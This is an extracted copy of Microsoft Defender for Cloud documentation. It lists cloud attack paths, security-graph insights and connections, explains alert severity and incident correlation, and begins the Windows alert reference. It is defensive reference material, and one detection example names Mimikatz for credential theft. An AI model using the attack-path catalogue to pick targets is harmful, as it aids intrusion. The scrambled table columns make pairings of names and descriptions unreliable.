Internet exposed VM has high severity A virtual machine is reachable from the internet and 
vulnerabilities and read permission to a has high severity vulnerabilities and read permission 


Key Vault to a key vault. 


Attack path display name 


VM has high severity vulnerabilities and 
high permission to a subscription 


VM has high severity vulnerabilities and 
read permission to a data store with 
sensitive data 


VM has high severity vulnerabilities and 
read permission to a key vault 


VM has high severity vulnerabilities and 
read permission to a data store 


Internet exposed VM has high severity 
vulnerability and insecure SSH private 
key that can authenticate to another VM 


Internet exposed VM has high severity 
vulnerabilities and has insecure secret 
that is used to authenticate to a SQL 
server 


VM has high severity vulnerabilities and 
has insecure secret that is used to 
authenticate to a SQL server 


VM has high severity vulnerabilities and 
has insecure plaintext secret that is used 
to authenticate to storage account 


Internet exposed VM has high severity 
vulnerabilities and has insecure secret 
that is used to authenticate to storage 
account 


AWS EC2 instances 


Prerequisite: Enable agentless scanning. 


Attack path display name 


Internet exposed EC2 instance has high 
severity vulnerabilities and high 


Attack path description 


A virtual machine has high severity vulnerabilities and 
has high permission to a subscription. 


A virtual machine has high severity vulnerabilities and 
read permission to a data store containing sensitive 
data. 

Prerequisite: Enable data-aware security for storage 
accounts in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


A virtual machine has high severity vulnerabilities and 
read permission to a key vault. 


A virtual machine has high severity vulnerabilities and 
read permission to a data store. 


An Azure virtual machine is reachable from the 
internet, has high severity vulnerabilities and has 
plaintext SSH private key that can authenticate to 
another AWS EC2 instance 


An Azure virtual machine is reachable from the 
internet, has high severity vulnerabilities and has 
plaintext SSH private key that can authenticate to an 
SQL server 


An Azure virtual machine has high severity 
vulnerabilities and has plaintext SSH private key that 
can authenticate to an SQL server 


An Azure virtual machine has high severity 
vulnerabilities and has plaintext SSH private key that 
can authenticate to an Azure storage account 


An Azure virtual machine is reachable from the 
internet, has high severity vulnerabilities and has 
secret that can authenticate to an Azure storage 
account 


Attack path description 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has permission to 


Attack path display name 


permission to an account 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to a DB 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to S3 bucket 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to a S3 bucket with sensitive 
data 


Internet exposed EC2 instance has high 
severity vulnerabilities and read 
permission to a KMS 


Internet exposed EC2 instance has high 
severity vulnerabilities 


EC2 instance with high severity 
vulnerabilities has high privileged 
permissions to an account 


EC2 instance with high severity 
vulnerabilities has read permissions to a 
data store 


EC2 instance with high severity 
vulnerabilities has read permissions to a 
data store with sensitive data 


Attack path description 


an account. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has permission to 
a database. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has an IAM role 
attached with permission to an S3 bucket via an IAM 
policy, or via a bucket policy, or via both an IAM 
policy and a bucket policy. 


An AWS EC2 instance is reachable from the internet 
has high severity vulnerabilities and has an IAM role 
attached with permission to an S3 bucket containing 
sensitive data via an IAM policy, or via a bucket 
policy, or via both an IAM policy and bucket policy. 
Prerequisite: Enable data-aware security for S3 
buckets in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has an IAM role 
attached with permission to an AWS Key 
Management Service (KMS) via an IAM policy, or via 
an AWS Key Management Service (KMS) policy, or via 
both an IAM policy and an AWS KMS policy. 


An AWS EC2 instance is reachable from the internet 
and has high severity vulnerabilities. 


An AWS EC2 instance has high severity vulnerabilities 
and has permissions to an account. 


An AWS EC2 instance has high severity vulnerabilities 
and has an IAM role attached which is granted with 

permissions to an S3 bucket via an IAM policy or via a 
bucket policy, or via both an IAM policy and a bucket 


policy. 


An AWS EC2 instance has high severity vulnerabilities 
and has an IAM role attached which is granted with 
permissions to an S3 bucket containing sensitive data 
via an IAM policy or via a bucket policy, or via both an 
IAM and bucket policy. 

Prerequisite: Enable data-aware security for S3 
buckets in Defender CSPM, or leverage Microsoft 
Purview Data Catalog to protect sensitive data. 


Attack path display name 


EC2 instance with high severity 
vulnerabilities has read permissions to a 
KMS key 


Internet exposed EC2 instance has high 
severity vulnerability and insecure SSH 
private key that can authenticate to 
another AWS EC2 instance 


Internet exposed EC2 instance has high 
severity vulnerabilities and has insecure 
secret that is used to authenticate to a 
RDS resource 


EC2 instance has high severity 
vulnerabilities and has insecure plaintext 
secret that is used to authenticate to a 
RDS resource 


Internet exposed AWS EC2 instance has 
high severity vulnerabilities and has 
insecure secret that has permission to S3 
bucket via an IAM policy, or via a bucket 
policy, or via both an IAM policy and a 
bucket policy. 


GCP VM Instances 


Attack path description 


An AWS EC2 instance has high severity vulnerabilities 
and has an IAM role attached which is granted with 
permissions to an AWS Key Management Service 
(KMS) key via an IAM policy, or via an AWS Key 
Management Service (KMS) policy, or via both an IAM 
and AWS KMS policy. 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has plaintext SSH 
private key that can authenticate to another AWS EC2 
instance 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has plaintext SSH 
private key that can authenticate to an AWS RDS 
resource 


An AWS EC2 instance has high severity vulnerabilities 
and has plaintext SSH private key that can 
authenticate to an AWS RDS resource 


An AWS EC2 instance is reachable from the internet, 
has high severity vulnerabilities and has insecure 
secret that has permissions to S3 bucket via an IAM 
policy, a bucket policy or both 


Attack path display name 


Internet exposed VM instance 
has high severity vulnerabilities 


Internet exposed VM instance 
with high severity 
vulnerabilities has read 
permissions to a data store 


Internet exposed VM instance 
with high severity 
vulnerabilities has read 
permissions to a data store 
with sensitive data 


Attack path description 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet and has high severity vulnerabilities [Remote Code 
Execution]. 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities[Remote Code 
Execution] and has read permissions to a data store. 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities allowing remote code 
execution on the machine and assigned with Service Account 
with read permission to GCP Storage bucket ‘[BucketName]' 
containing sensitive data. 


Attack path display name 


Internet exposed VM instance 
has high severity vulnerabilities 
and high permission to a 
project 


Internet exposed VM instance 
with high severity 
vulnerabilities has read 
permissions to a Secret 
Manager 


Internet exposed VM instance 
has high severity vulnerabilities 
and a hosted database 
installed 


Internet exposed VM with high 
severity vulnerabilities has 
plaintext SSH private key 


VM instance with high severity 
vulnerabilities has read 
permissions to a data store 


VM instance with high severity 
vulnerabilities has read 
permissions to a data store 
with sensitive data 


VM instance has high severity 
vulnerabilities and high 
permission to a project 


VM instance with high severity 
vulnerabilities has read 
permissions to a Secret 
Manager 


VM instance with high severity 
vulnerabilities has plaintext 
SSH private key 


Azure data 


Attack path description 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities[Remote Code 
Execution] and has ‘[Permissions]' permission to project 
‘[ProjectName]’. 


GCP VM instance '[VMInstanceName]’ is reachable from the 
internet, has high severity vulnerabilities[Remote Code 

Execution] and has read permissions through IAM policy to GCP 
Secret Manager's secret '[SecretName]'. 


GCP VM instance '[VMInstanceName]' with a hosted 
[DatabaseType] database is reachable from the internet and has 
high severity vulnerabilities. 


GCP VM instance '[MachineName]' is reachable from the 
internet, has high severity vulnerabilities [Remote Code 
Execution] and has plaintext SSH private key [SSHPrivateKey]. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities[Remote Code Execution] and has read 
permissions to a data store. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities [Remote Code Execution] and has read 
permissions to GCP Storage bucket ‘[BucketName]' containing 
sensitive data. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities[Remote Code Execution] and has ‘[Permissions]' 
permission to project ‘[ProjectName]'. 


GCP VM instance '[VMInstanceName]' has high severity 
vulnerabilities[Remote Code Execution] and has read 

permissions through IAM policy to GCP Secret Manager's secret 
‘[SecretName]'. 


GCP VM instance to align with all other attack paths. Virtual 
machine ‘[MachineName]' has high severity vulnerabilities 
[Remote Code Execution] and has plaintext SSH private key 
[SSHPrivateKey]. 


Attack path display name 


Internet exposed SQL on VM has a 
user account with commonly used 
username and allows code execution 
on the VM (Preview) 


Internet exposed SQL on VM has a 
user account with commonly used 
username and known vulnerabilities 
(Preview) 


SQL on VM has a user account with 
commonly used username and allows 
code execution on the VM (Preview) 


SQL on VM has a user account with 
commonly used username and 
known vulnerabilities (Preview) 


Managed database with excessive 
internet exposure allows basic (local 
user/password) authentication 
(Preview) 


Managed database with excessive 
internet exposure and sensitive data 
allows basic (local user/password) 
authentication (Preview) 


Internet exposed managed database 
with sensitive data allows basic (local 
user/password) authentication 
(Preview) 


Internet exposed VM has high 
severity vulnerabilities and a hosted 
database installed (Preview) 


Attack path description 


SQL on VM is reachable from the internet, has a local 
user account with a commonly used username (which is 
prone to brute force attacks), and has vulnerabilities 
allowing code execution and lateral movement to the 
underlying VM. 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on VM is reachable from the internet, has a local 
user account with a commonly used username (which is 
prone to brute force attacks), and has known 
vulnerabilities (CVEs). 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on VM has a local user account with a commonly 
used username (which is prone to brute force attacks), 
and has vulnerabilities allowing code execution and 
lateral movement to the underlying VM. 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on VM has a local user account with a commonly 
used username (which is prone to brute force attacks), 
and has known vulnerabilities (CVEs). 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


The database can be accessed through the internet from 
any public IP and allows authentication using username 
and password (basic authentication mechanism) which 
exposes the DB to brute force attacks. 


The database can be accessed through the internet from 
any public IP and allows authentication using username 
and password (basic authentication mechanism) which 
exposes a DB with sensitive data to brute force attacks. 


The database can be accessed through the internet from 
specific IPs or IP ranges and allows authentication using 
username and password (basic authentication 
mechanism) which exposes a DB with sensitive data to 
brute force attacks. 


An attacker with network access to the DB machine can 
exploit the vulnerabilities and gain remote code 
execution. 


Attack path display name 


Private Azure blob storage container 
replicates data to internet exposed 
and publicly accessible Azure blob 
storage container 


Internet exposed Azure Blob Storage 
container with sensitive data is 
publicly accessible 


AWS data 


Attack path display name 


Internet exposed AWS S3 Bucket with 
sensitive data is publicly accessible 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and allows code 
execution on the underlying compute 
(Preview) 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and known 
vulnerabilities (Preview) 


SQL on EC2 instance has a user 
account with commonly used 
username and allows code execution 
on the underlying compute (Preview) 


SQL on EC2 instance has a user 
account with commonly used 
username and known vulnerabilities 
(Preview) 


Attack path description 


An internal Azure storage container replicates its data to 
another Azure storage container thatis reachable from 
the internet and allows public access, and poses this data 
at risk. 


A blob storage account container with sensitive data is 
reachable from the internet and allows public read access 
without authorization required. 

Prerequisite: Enable data-aware security for storage 
accounts in Defender CSPM. 


Attack path description 


An S3 bucket with sensitive data is reachable from the 
internet and allows public read access without 
authorization required. 

Prerequisite: Enable data-aware security for S3 buckets 
in Defender CSPM, or leverage Microsoft Purview Data 
Catalog to protect sensitive data. 


Internet exposed SQL on EC2 instance has a user 
account with commonly used username and allows code 
execution on the underlying compute. 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines. 


SQL on EC2 instance is reachable from the internet, has a 
local user account with a commonly used username 
(which is prone to brute force attacks), and has known 
vulnerabilities (CVEs). 

Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on EC2 instance has a local user account with 
commonly used username (which is prone to brute force 
attacks), and has vulnerabilities allowing code execution 
and lateral movement to the underlying compute. 
Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


SQL on EC2 instance [EC2Name] has a local user account 
with commonly used username (which is prone to brute 
force attacks), and has known vulnerabilities (CVEs). 


Attack path display name 


Managed database with excessive 
internet exposure allows basic (local 
user/password) authentication 
(Preview) 


Managed database with excessive 
internet exposure and sensitive data 
allows basic (local user/password) 
authentication (Preview) 


Internet exposed managed database 
with sensitive data allows basic (local 
user/password) authentication 
(Preview) 


Internet exposed EC2 instance has 
high severity vulnerabilities and a 
hosted database installed (Preview) 


Private AWS S3 bucket replicates data 
to internet exposed and publicly 
accessible AWS S3 bucket 


RDS snapshot is publicly available to 
all AWS accounts (Preview) 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and allows code 
execution on the underlying compute 
(Preview) 


Internet exposed SQL on EC2 instance 
has a user account with commonly 
used username and known 
vulnerabilities (Preview) 


SQL on EC2 instance has a user 
account with commonly used 
username and allows code execution 
on the underlying compute (Preview) 


SQL on EC2 instance has a user 
account with commonly used 


Attack path description 


Prerequisite: Enable Microsoft Defender for SQL servers 
on machines 


The database can be accessed through the internet from 
any public IP and allows authentication using username 
and password (basic authentication mechanism) which 
exposes the DB to brute force attacks. 


The database can be accessed through the internet from 
any public IP and allows authentication using username 
and password (basic authentication mechanism) which 
exposes a DB with sensitive data to brute force attacks. 


The database can be accessed through the internet from 
specific IPs or IP ranges and allows authentication using 
username and password (basic authentication 
mechanism) which exposes a DB with sensitive data to 
brute force attacks. 


An attacker with network access to the DB machine can 
exploit the vulnerabilities and gain remote code 
execution. 


An internal AWS S3 bucket replicates its data to another 
S3 bucket whichis reachable from the internet and 
allows public access, and poses this data at risk. 


A snapshot of an RDS instance or cluster is publicly 
accessible by all AWS accounts. 


SQL on EC2 instance is reachable from the internet, has a 
local user account with commonly used username (which 
is prone to brute force attacks), and has vulnerabilities 
allowing code execution and lateral movement to the 
underlying compute 


SQL on EC2 instance is reachable from the internet, has a 
local user account with commonly used username (which 
is prone to brute force attacks), and has known 
vulnerabilities (CVEs) 


SQL on EC2 instance has a local user account with 
commonly used username (which is prone to brute force 
attacks), and has vulnerabilities allowing code execution 
and lateral movement to the underlying compute 


SQL on EC2 instance has a local user account with 
commonly used username (which is prone to brute force 
attacks), and has known vulnerabilities (CVEs) 


Attack path display name 


username and known vulnerabilities 
(Preview) 


Private AWS S3 bucket replicates data 
to internet exposed and publicly 
accessible AWS S3 bucket 


Private AWS S3 bucket with sensitive 
data replicates data to internet 
exposed and publicly accessible AWS 
S3 bucket 


RDS snapshot is publicly available to 
all AWS accounts (Preview) 


GCP data 


Attack path description 


Private AWS S3 bucket is replicating data to internet 
exposed and publicly accessible AWS S3 bucket 


Private AWS S3 bucket with sensitive data is replicating 
data to internet exposed and publicly accessible AWS S3 
bucket 


RDS snapshot is publicly available to all AWS accounts 


Attack path display name Attack path description 


GCP Storage Bucket with sensitive GCP Storage Bucket [BucketName] with sensitive data allows 


data is publicly accessible public read access without authorization required. 


Azure containers 


Prerequisite: Enable agentless container posture. This will also give you the ability to 


query containers data plane workloads in security explorer. 


Attack path display name 


Internet exposed Kubernetes pod is 
running a container with RCE 
vulnerabilities 


Kubernetes pod running on an 
internet exposed node uses host 
network is running a container with 
RCE vulnerabilities 


GitHub repositories 


Attack path description 


An internet exposed Kubernetes pod in a namespace is 
running a container using an image that has vulnerabilities 
allowing remote code execution. 


A Kubernetes pod in a namespace with host network 
access enabled is exposed to the internet via the host 
network. The pod is running a container using an image 
that has vulnerabilities allowing remote code execution. 


Prerequisite: Enable Defender for DevOps. 


Attack path display name 


Internet exposed GitHub repository 
with plaintext secret is publicly 


accessible (Preview) 


Attack path description 


A GitHub repository is reachable from the internet, allows 
public read access without authorization required, and 


holds plaintext secrets. 


Cloud security graph components list 


This section lists all of the cloud security graph components (connections and insights) 


that can be used in queries with the cloud security explorer. 


Insights 


Insight 


Exposed to the internet 


Allows basic 
authentication (Preview) 


Contains sensitive data 


Prerequisite: Enable 
data-aware security for 
storage accounts in 
Defender CSPM, or 
leverage Microsoft 
Purview Data Catalog to 
protect sensitive data. 


Description 


Indicates that a resource is 
exposed to the internet. 
Supports port filtering. Learn 
more 


Indicates that a resource 
allows basic (local 
user/password or key-based) 
authentication 


Indicates that a resource 
contains sensitive data. 


Supported entities 


Azure virtual machine, AWS EC2, Azure 
storage account, Azure SQL server, 
Azure Cosmos DB, AWS S3, Kubernetes 
pod, Azure SQL Managed Instance, 
Azure MySQL Single Server, Azure 
MySQL Flexible Server, Azure 
PostgreSQL Single Server, Azure 
PostgreSQL Flexible Server, Azure 
MariaDB Single Server, Synapse 
Workspace, RDS Instance, GCP VM 
instance, GCP SQL admin instance 


Azure SQL Server, RDS Instance, Azure 
MariaDB Single Server, Azure MySQL 
Single Server, Azure MySQL Flexible 
Server, Synapse Workspace, Azure 
PostgreSQL Single Server, Azure SQL 
Managed Instance 


MDC Sensitive data discovery: 


Azure Storage Account, Azure Storage 
Account Container, AWS S3 bucket, 
Azure SQL Server (preview), Azure SQL 
Database (preview), RDS Instance 
(preview), RDS Instance Database 
(preview), RDS Cluster (preview) 


Purview Sensitive data discovery 
(preview): 


Azure Storage Account, Azure Storage 


Insight 


Moves data to (Preview) 


Gets data from 


(Preview) 


Has tags 


Installed software 


Allows public access 


Doesn't have MFA 
enabled 


Is external user 


Is managed 


Contains common 
usernames 


Description 


Indicates that a resource 
transfers its data to another 
resource 


Indicates that a resource gets 
its data from another 
resource 


Lists the resource tags of the 
cloud resource 


Lists all software installed on 
the machine. This insight is 
applicable only for VMs that 
have threat and vulnerability 
management integration 
with Defender for Cloud 
enabled and are connected 
to Defender for Cloud. 


Indicates that a public read 
access is allowed to the 
resource with no 
authorization required. Learn 
more 


Indicates that the user 
account does not have a 
multi-factor authentication 
solution enabled 


Indicates that the user 
account is outside the 
organization's domain 


Indicates that an identity is 
managed by the cloud 
provider 


Indicates that a SQL server 
has user accounts with 


Supported entities 


Account Container, AWS S3 bucket, 
Azure SQL Server, Azure SQL Database, 
Azure Data Lake Storage Gen2, Azure 
Database for PostgreSQL, Azure 
Database for MySQL, Azure Synapse 
Analytics, Azure Cosmos DB accounts, 
GCP cloud storage bucket 


Storage account container, AWS S3, 


AWS RDS instance, AWS RDS cluster 


Storage account container, AWS S3, 
AWS RDS instance, AWS RDS cluster 


All Azure, AWS, and GCP resources 


Azure virtual machine, AWS EC2 


Azure storage account, AWS S3 bucket, 
GitHub repository, GCP cloud storage 
bucket 


Azure AD User account, IAM user 


Azure AD User account 


Azure Managed Identity 


SQL VM, Arc-Enabled SQL VM 


Insight 


Can execute code on 
the host 


Has vulnerabilities 


DEASM findings 


Privileged container 


Uses host network 


Has high severity 
vulnerabilities 


Vulnerable to remote 
code execution 


Public IP metadata 


Identity metadata 


Connections 


Connection 


Can 
authenticate 


Description 


Indicates that an 
Azure resource can 


Description 


common usernames which 
are prone to brute force 
attacks. 


Indicates that a SQL server 
allows executing code on the 
underlying VM using a built- 
in mechanism such as 
xp_cmdshell. 


Indicates that the resource 
SQL server has vulnerabilities 
detected 


Microsoft Defender External 
Attack Surface Management 
(DEASM) internet scanning 
findings 


Indicates that a Kubernetes 
container runs in a privileged 
mode 


Indicates that a Kubernetes 
pod uses the network 
namespace of its host 
machine 


Indicates that a resource has 
high severity vulnerabilities 


Indicates that a resource has 
vulnerabilities allowing 
remote code execution 


Lists the metadata of an 
Public IP 


Lists the metadata of an 
identity 


Source entity types 


Azure VM, Azure VMSS, Azure 
Storage Account, Azure App 


Supported entities 


SQL VM, Arc-Enabled SQL VM 


SQL VM, Arc-Enabled SQL VM 


Public IP 


Kubernetes container 


Kubernetes pod 


Azure VM, AWS EC2, Container image, 


GCP VM instance 


Azure VM, AWS EC2, Container image, 


GCP VM instance 


Public IP 


Azure AD Identity 


Destination entity 


types 


identity 


Azure AD managed 


Connection 


as 


Has 
permission 
to 


Contains 


Routes 
traffic to 


Is running 


Member of 


Maintains 


Description 


authenticate to an 
identity and use its 
privileges 


Indicates that an 
identity has 
permissions to a 
resource or a 
group of resources 


Indicates that the 
source entity 
contains the target 
entity 


Indicates that the 
source entity can 
route network 
traffic to the target 
entity 


Indicates that the 
source entity is 
running the target 
entity as a process 


Indicates that the 
source identity is a 
member of the 
target identities 
group 


Indicates that the 
source Kubernetes 
entity manages the 
life cycle of the 


Source entity types 


Services, SQL Servers 


Azure AD user account, Managed 


Identity, IAM user, EC2 instance 


Azure subscription, Azure 
resource group, AWS account, 
Kubernetes namespace, 
Kubernetes pod, Kubernetes 
cluster, GitHub owner, Azure 
DevOps project, Azure DevOps 
organization, Azure SQL server, 
RDS Cluster, RDS Instance, GCP 
project, GCP Folder, GCP 
Organization 


Public IP, Load Balancer, VNET, 
Subnet, VPC, Internet Gateway, 
Kubernetes service, Kubernetes 
pod 


Azure VM, EC2, Kubernetes 
container 


Azure AD group, Azure AD user 


Kubernetes workload controller, 
Kubernetes replica set, 
Kubernetes stateful set, 
Kubernetes daemon set, 


Destination entity 
types 


All Azure & AWS 
resources 


All Azure, AWS, and 
GCP resources, All 
Kubernetes entities, All 
DevOps entities, Azure 
SQL database, RDS 
Instance, RDS Instance 
Database 


Azure VM, Azure VMSS, 
AWS EC2, Subnet, Load 
Balancer, Internet 
gateway, Kubernetes 
pod, Kubernetes 
service, GCP VM 
instance, GCP instance 


group 


SQL, Arc-Enabled SQL, 
Hosted MongoDB, 
Hosted MySQL, Hosted 
Oracle, Hosted 
PostgreSQL, Hosted 
SQL Server, Container 
image, Kubernetes pod 


Azure AD group 


Kubernetes pod 


Connection Description Source entity types 


target Kubernetes  Kubernetes jobs, Kubernetes cron 
entity job 


Next steps 


e Identify and analyze risks across your environment 
e Identify and remediate attack paths 
e Cloud security explorer 


Destination entity 
types 


Security alerts and incidents 


Article e 05/29/2023 


This article describes security alerts and notifications in Microsoft Defender for Cloud. 


What are security alerts? 


Security alerts are the notifications generated by Defender for Cloud's workload 
protection plans when threats are identified in your Azure, hybrid, or multicloud 


environments. 


e Security alerts are triggered by advanced detections available when you enable 
Defender plans for specific resource types. 

e Each alert provides details of affected resources, issues, and remediation steps. 

e Defender for Cloud classifies alerts and prioritizes them by severity. 

e Alerts are displayed in the portal for 90 days, even if the resource related to the 
alert was deleted during that time. This is because the alert might indicate a 
potential breach to your organization that needs to be further investigated. 

e Alerts can be exported to CSV format. 

e Alerts can also be streamed directly to a Security Information and Event 
Management (SIEM) such as Microsoft Sentinel, Security Orchestration Automated 
Response (SOAR), or IT Service Management (ITSM) solution. 

e Defender for Cloud leverages the MITRE Attack Matrix” to associate alerts with 
their perceived intent, helping formalize security domain knowledge. 


How are alerts classified? 


Alerts have a severity level assigned to help prioritize how to attend to each alert. 


Severity is based on: 


e The specific trigger 
e The confidence level that there was malicious intent behind the activity that led to 


the alert 
Severity Recommended response 
High There is a high probability that your resource is compromised. You should look 


into it right away. Defender for Cloud has high confidence in both the malicious 
intent and in the findings used to issue the alert. For example, an alert that 
detects the execution of a known malicious tool such as Mimikatz, a common 
tool used for credential theft. 


Severity Recommended response 


Medium This is probably a suspicious activity might indicate that a resource is 
compromised. Defender for Cloud's confidence in the analytic or finding is 
medium and the confidence of the malicious intent is medium to high. These 
would usually be machine learning or anomaly based detections, for example a 
sign-in attempt from an unusual location. 


Low This might be a benign positive or a blocked attack. Defender for Cloud isn't 
confident enough that the intent is malicious and the activity might be innocent. 
For example, log clear is an action that might happen when an attacker tries to 
hide their tracks, but in many cases is a routine operation performed by admins. 
Defender for Cloud doesn't usually tell you when attacks were blocked, unless it's 
an interesting case that we suggest you look into. 


Informational An incident is typically made up of a number of alerts, some of which might 
appear on their own to be only informational, but in the context of the other 
alerts might be worthy of a closer look. 


What are security incidents? 


A security incident is a collection of related alerts. 


Incidents provide you with a single view of an attack and its related alerts, so that you 
can quickly understand the actions an attacker took, and the affected resources. 


As the breath of threat coverage grows, so does the need to detect even the slightest 
compromise. It's challenging for security analysts to triage different alerts and identify 
an actual attack. By correlating alerts and low fidelity signals into security incidents, 
Defender for Cloud helps analysts cope with this alert fatigue. 


In the cloud, attacks can occur across different tenants, Defender for Cloud can combine 
Al algorithms to analyze attack sequences that are reported on each Azure subscription. 
This technique identifies the attack sequences as prevalent alert patterns, instead of just 
being incidentally associated with each other. 


During an investigation of an incident, analysts often need extra context to reach a 
verdict about the nature of the threat and how to mitigate it. For example, even when a 
network anomaly is detected, without understanding what else is happening on the 
network or with regard to the targeted resource, it's difficult to understand what actions 
to take next. To help, a security incident can include artifacts, related events, and 
information. The additional information available for security incidents varies, depending 
on the type of threat detected and the configuration of your environment. 


Correlating alerts into incidents 
Defender for Cloud correlates alerts and contextual signals into incidents. 


e Correlation looks at different signals across resources and combines security 
knowledge and Al to analyze alerts, discovering new attack patterns as they occur. 

e By using the information gathered for each step of an attack, Defender for Cloud 
can also rule out activity that appears to be steps of an attack, but actually isn't. 


Q Tip 


In the incidents reference, review the list of security incident that can be produced 
by incident correlation. 


How does Defender for Cloud detect threats? 


To detect real threats and reduce false positives, Defender for Cloud monitors resources, 
collects, and analyzes data for threats, often correlating data from multiple sources. 


Monitor traffic Collect Logs Analyze data 
for threats 


Present this information in a single dashboard 


Microsoft initiatives 


Microsoft Defender for Cloud benefits from having security research and data science 
teams throughout Microsoft who continuously monitor for changes in the threat 
landscape. This includes the following initiatives: 


e Microsoft security specialists: Ongoing engagement with teams across Microsoft 
that work in specialized security fields, like forensics and web attack detection. 


e Microsoft security research: Our researchers are constantly on the lookout for 
threats. Because of our global presence in the cloud and on-premises, we have 
access to an expansive set of telemetry. The wide-reaching and diverse collection 
of datasets enables us to discover new attack patterns and trends across our on- 
premises consumer and enterprise products, as well as our online services. As a 
result, Defender for Cloud can rapidly update its detection algorithms as attackers 
release new and increasingly sophisticated exploits. This approach helps you keep 


pace with a fast moving threat environment. 


e Threat intelligence monitoring: Threat intelligence includes mechanisms, 
indicators, implications, and actionable advice about existing or emerging threats. 
This information is shared in the security community and Microsoft continuously 


monitors threat intelligence feeds from internal and external sources. 


e Signal sharing: Insights from security teams across Microsoft's broad portfolio of 
cloud and on-premises services, servers, and client endpoint devices are shared 
and analyzed. 


e Detection tuning: Algorithms are run against real customer data sets and security 
researchers work with customers to validate the results. True and false positives are 
used to refine machine learning algorithms. 


These combined efforts culminate in new and improved detections, which you can 
benefit from instantly — there's no action for you to take. 


Security analytics 


Defender for Cloud employs advanced security analytics, which go far beyond 
signature-based approaches. Breakthroughs in big data and machine learning E 
technologies are leveraged to evaluate events across the entire cloud fabric — detecting 
threats that would be impossible to identify using manual approaches and predicting 
the evolution of attacks. These security analytics include: 


Integrated threat intelligence 


Microsoft has an immense amount of global threat intelligence. Telemetry flows in from 
multiple sources, such as Azure, Microsoft 365, Microsoft CRM online, Microsoft 
Dynamics AX, outlook.com, MSN.com, the Microsoft Digital Crimes Unit (DCU), and 
Microsoft Security Response Center (MSRC). Researchers also receive threat intelligence 
information that is shared among major cloud service providers and feeds from other 
third parties. Microsoft Defender for Cloud can use this information to alert you to 
threats from known bad actors. 


Behavioral analytics 


Behavioral analytics is a technique that analyzes and compares data to a collection of 
known patterns. However, these patterns are not simple signatures. They are determined 
through complex machine learning algorithms that are applied to massive datasets. 
They are also determined through careful analysis of malicious behaviors by expert 
analysts. Microsoft Defender for Cloud can use behavioral analytics to identify 


compromised resources based on analysis of virtual machine logs, virtual network 


device logs, fabric logs, and other sources. 


Anomaly detection 


Defender for Cloud also uses anomaly detection to identify threats. In contrast to 
behavioral analytics that depends on known patterns derived from large data sets, 
anomaly detection is more "personalized" and focuses on baselines that are specific to 
your deployments. Machine learning is applied to determine normal activity for your 
deployments and then rules are generated to define outlier conditions that could 


represent a security event. 


Exporting alerts 


You have a range of options for viewing your alerts outside of Defender for Cloud, 


including: 


e Download CSV report on the alerts dashboard provides a one-time export to CSV. 

e Continuous export from Environment settings allows you to configure streams of 
security alerts and recommendations to Log Analytics workspaces and Event Hubs. 
Learn more. 

e Microsoft Sentinel connector streams security alerts from Microsoft Defender for 
Cloud into Microsoft Sentinel. Learn more . 


Learn about streaming alerts to a SIEM, SOAR, or IT Service Management solution and 
how to continuously export data. 


Next steps 


In this article, you learned about the different types of alerts available in Defender for 
Cloud. For more information, see: 


e Security alerts in Azure Activity log Z - In addition to being available in the Azure 
portal or programmatically, Security alerts and incidents are audited as events in 
Azure Activity Log 

e Reference table of Defender for Cloud alerts 

e Respond to security alerts 

e Learn how to manage security incidents in Defender for Cloud. 


Security alerts - a reference guide 


Article e 05/31/2023 


This article lists the security alerts you might get from Microsoft Defender for Cloud and any Microsoft Defender plans 


you've enabled. The alerts shown in your environment depend on the resources and services you're protecting, and your 


customized configuration. 


At the bottom of this page, there's a table describing the Microsoft Defender for Cloud kill chain aligned with version 9 


of the MITRE ATT&CK matrix”. 
Learn how to respond to these alerts. 


Learn how to export alerts. 


© Note 


Alerts from different sources might take different amounts of time to appear. For example, alerts that require 


analysis of network traffic might take longer to appear than alerts related to suspicious processes running on virtual 


machines. 


Alerts for Windows machines 


Microsoft Defender for Servers Plan 2 provides unique detections and alerts, in addition to the ones provided by 


Microsoft Defender for Endpoint. The alerts provided for Windows machines are: 


Further details and notes 


Alert (alert type) 


A logon from a malicious IP has been detected. 
[seen multiple times] 


Addition of Guest account to Local Administrators 
group 


An event log was cleared 


Antimalware Action Failed 


Antimalware Action Taken 


Description 


A successful remote authentication for the account 
[account] and process [process] occurred, however the 
logon IP address (x.x.x.x) has previously been reported 
as malicious or highly unusual. A successful attack has 
probably occurred. Files with the .scr extensions are 
screen saver files and are normally reside and execute 
from the Windows system directory. 


Analysis of host data has detected the addition of the 
built-in Guest account to the Local Administrators 
group on %{Compromised Host}, which is strongly 
associated with attacker activity. 


Machine logs indicate a suspicious event log clearing 
operation by user: '%{user name}' in Machine: '% 
{CompromisedEntity}'. The %{log channel} log was 
cleared. 


Microsoft Antimalware has encountered an error when 
taking an action on malware or other potentially 
unwanted software. 


Microsoft Antimalware for Azure has taken an action 
to protect this machine from malware or other 
potentially unwanted software. 


MITRE 
